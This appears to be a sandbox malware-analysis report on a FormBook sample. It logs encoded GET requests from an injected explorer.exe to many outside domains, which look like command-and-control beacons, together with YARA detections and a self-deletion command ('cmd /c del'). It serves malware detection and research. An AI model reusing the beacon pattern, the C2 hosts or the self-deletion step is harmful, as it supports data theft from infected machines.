location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=booweats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-5cc4cbb56f-5qv64
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49773 | 154.93.81.33 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:04:20.187233925 CEST | 6053 | OUT | GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=oJz4pJjdv4YVSt0+MmS2FtCA6v4cV0g87aIryYx21PY21L+ds7v/9rK+HMpewy0ytB7Z HTTP/1.1
Host: www.cuntrera.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.4 | 49775 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:04:31.017971039 CEST | 6060 | OUT | GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=s0IAE6utMOpEbBTXfVBtMvohtOMhwSGLvfPwlSEa+yA+XVzrnw8OQ7eif0DqkxnFDccR HTTP/1.1
Host: www.changethecompany.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:04:31.157010078 CEST | 6060 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 18:04:31 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6096ba97-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49757 | 198.54.114.164 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:03:26.705135107 CEST | 2204 | OUT | GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=Nfl9li5qPifS0qmI3oGyYt+1WQBc6+s+CWT3m3ZkN/MuRx1xa905Jr26QEss+PYMzBmi HTTP/1.1
Host: www.nowhealthdays.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:03:26.905880928 CEST | 2206 | IN | HTTP/1.1 404 Not Found
date: Wed, 12 May 2021 18:03:26 GMT
server: Apache
accept-ranges: bytes
transfer-encoding: chunked
content-type: text/html
connection: close
Data Raw: 32 31 36 38 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20
Data Ascii: 2168<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 20:03:32.055988073 CEST | 5992 | OUT | GET /or4i/?HFQDEL_8=9uknvSs0D9sRUbKPNEJc//q5kM+rT7HBD1bOe0TigX7EwC/pCwMCwQN4ECUA0466XB/p&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.ikeberto.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 20:03:32.193681002 CEST | 5993 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 18:03:32 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60995c0c-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.449764185.4.135.13680C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  May 12, 2021 20:03:37.372333050 CEST6017OUTGET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx HTTP/1.1
                                                                                  Host: www.directflence.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  May 12, 2021 20:03:37.449553967 CEST6018INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 12 May 2021 18:03:37 GMT
                                                                                  Server: Apache
                                                                                  Location: https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx
                                                                                  Cache-Control: max-age=2592000
                                                                                  Expires: Fri, 11 Jun 2021 18:03:37 GMT
                                                                                  Content-Length: 348
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 69 72 65 63 74 66 6c 65 6e 63 65 2e 63 6f 6d 2f 6f 72 34 69 2f 3f 34 68 5f 48 43 76 3d 61 32 4a 44 61 30 58 78 32 32 49 70 57 78 6a 50 26 61 6d 70 3b 48 46 51 44 45 4c 5f 38 3d 58 5a 35 65 67 46 6c 4d 34 4c 75 52 37 6a 75 63 30 55 46 50 36 66 61 69 2b 58 58 32 49 38 53 56 38 55 72 31 49 65 71 33 6f 4e 7a 57 34 62 2b 4f 43 53 6d 36 41 42 51 50 47 74 46 52 78 4a 58 72 30 36 6b 78 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.directflence.com/or4i/?4h_HCv=a2JDa0Xx22IpWxjP&amp;HFQDEL_8=XZ5egFlM4LuR7juc0UFP6fai+XX2I8SV8Ur1Ieq3oNzW4b+OCSm6ABQPGtFRxJXr06kx">here</a>.</p></body></html>


Session ID: 5
Source IP: 192.168.2.4
Source Port: 49765
Destination IP: 3.16.197.4
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: May 12, 2021 20:03:42.767637014 CEST
kBytes transferred: 6019
Direction: OUT
Data: GET /or4i/?HFQDEL_8=kdp3FbqcdOoi47L6CSewezhnIrd3vGjo7ZesdbmmEgh4+nsMxNwHdMyhwqYehAYq5sNV&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.mmgenius.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: May 12, 2021 20:03:42.905261993 CEST
kBytes transferred: 6020
Direction: IN
Data: HTTP/1.1 404 Not Found
Date: Wed, 12 May 2021 18:03:42 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID: 6
Source IP: 192.168.2.4
Source Port: 49766
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: May 12, 2021 20:03:48.045959949 CEST
kBytes transferred: 6020
Direction: OUT
Data: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=+ijMlDuYhuzidrLjkbi+elVKZ7K6phzLRhFwzYI2MHaYrqu+hiZ6wsf57yroxB2MR5WJ HTTP/1.1
Host: www.rainboxs.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: May 12, 2021 20:03:48.182682037 CEST
kBytes transferred: 6021
Direction: IN
Data: HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 18:03:48 GMT
Content-Type: text/html
Content-Length: 275
ETag: "609953da-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 7
Source IP: 192.168.2.4
Source Port: 49767
Destination IP: 209.222.96.146
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: May 12, 2021 20:03:53.476977110 CEST
kBytes transferred: 6022
Direction: OUT
Data: GET /or4i/?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.nobleandmarble.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: May 12, 2021 20:03:53.613686085 CEST
kBytes transferred: 6022
Direction: IN
Data: HTTP/1.1 302 Found
Date: Wed, 12 May 2021 18:03:53 GMT
Server: Apache
Location: http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&4h_HCv=a2JDa0Xx22IpWxjP
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.nobleandmarble.com/cgi-sys/suspendedpage.cgi?HFQDEL_8=xTiNYjpz6T1Ak7oOPc1RU9z7aC84W9njSzpqqU4XaljqjdkzZuZgpX+EsFAQyzNyJi0r&amp;4h_HCv=a2JDa0Xx22IpWxjP">here</a>.</p></body></html>


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49768
Destination IP: 23.227.38.74
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: May 12, 2021 20:04:03.782355070 CEST
kBytes transferred: 6024
Direction: OUT
Data: GET /or4i/?HFQDEL_8=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU3+bG1fp/+sg3&4h_HCv=a2JDa0Xx22IpWxjP HTTP/1.1
Host: www.safegrinder.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: May 12, 2021 20:04:04.026160002 CEST
kBytes transferred: 6026
Direction: IN
Data: HTTP/1.1 403 Forbidden
Date: Wed, 12 May 2021 18:04:04 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: 156
X-Sorting-Hat-ShopId: 46831239325
X-Dc: gcp-us-central1
X-Request-ID: e6a60d92-4f25-4e5a-82cb-4009d2ef67ba
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
cf-request-id: 0a035919650000c2ef55899000000001
Server: cloudflare
CF-RAY: 64e5913bdf2cc2ef-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig


Session ID: 9
Source IP: 192.168.2.4
Source Port: 49771
Destination IP: 34.102.136.180
Destination Port: 80
Process: C:\Windows\explorer.exe

Timestamp: May 12, 2021 20:04:09.156018019 CEST
kBytes transferred: 6049
Direction: OUT
Data: GET /or4i/?4h_HCv=a2JDa0Xx22IpWxjP&HFQDEL_8=1XIvg6XU5vVZMvk0S+FgKHUoBBBn1K6+BdhisE+/5jtYq3yTMpA8lYHSBxv+eIZJV1A/ HTTP/1.1
Host: www.tecquestrian.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: May 12, 2021 20:04:09.293071032 CEST
kBytes transferred: 6050
Direction: IN
Data: HTTP/1.1 403 Forbidden
Server: openresty
Date: Wed, 12 May 2021 18:04:09 GMT
Content-Type: text/html
Content-Length: 275
ETag: "60995c49-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 20:02:19
Start date: 12/05/2021
Path: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
Imagebase: 0x400000
File size: 418969 bytes
MD5 hash: 1CEC9342AC2C1F91201DF672382672F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.657286033.0000000002340000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 20:02:20
Start date: 12/05/2021
Path: C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
Imagebase: 0x400000
File size: 418969 bytes
MD5 hash: 1CEC9342AC2C1F91201DF672382672F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.650458502.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693950928.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693323611.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.693535798.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 20:02:25
Start date: 12/05/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:02:40
Start date: 12/05/2021
Path: C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\wlanext.exe
Imagebase: 0x11c0000
File size: 78848 bytes
MD5 hash: CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.906821366.0000000001030000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907308680.00000000032A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.907353969.0000000003300000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 20:02:44
Start date: 12/05/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 20:02:44
Start date: 12/05/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
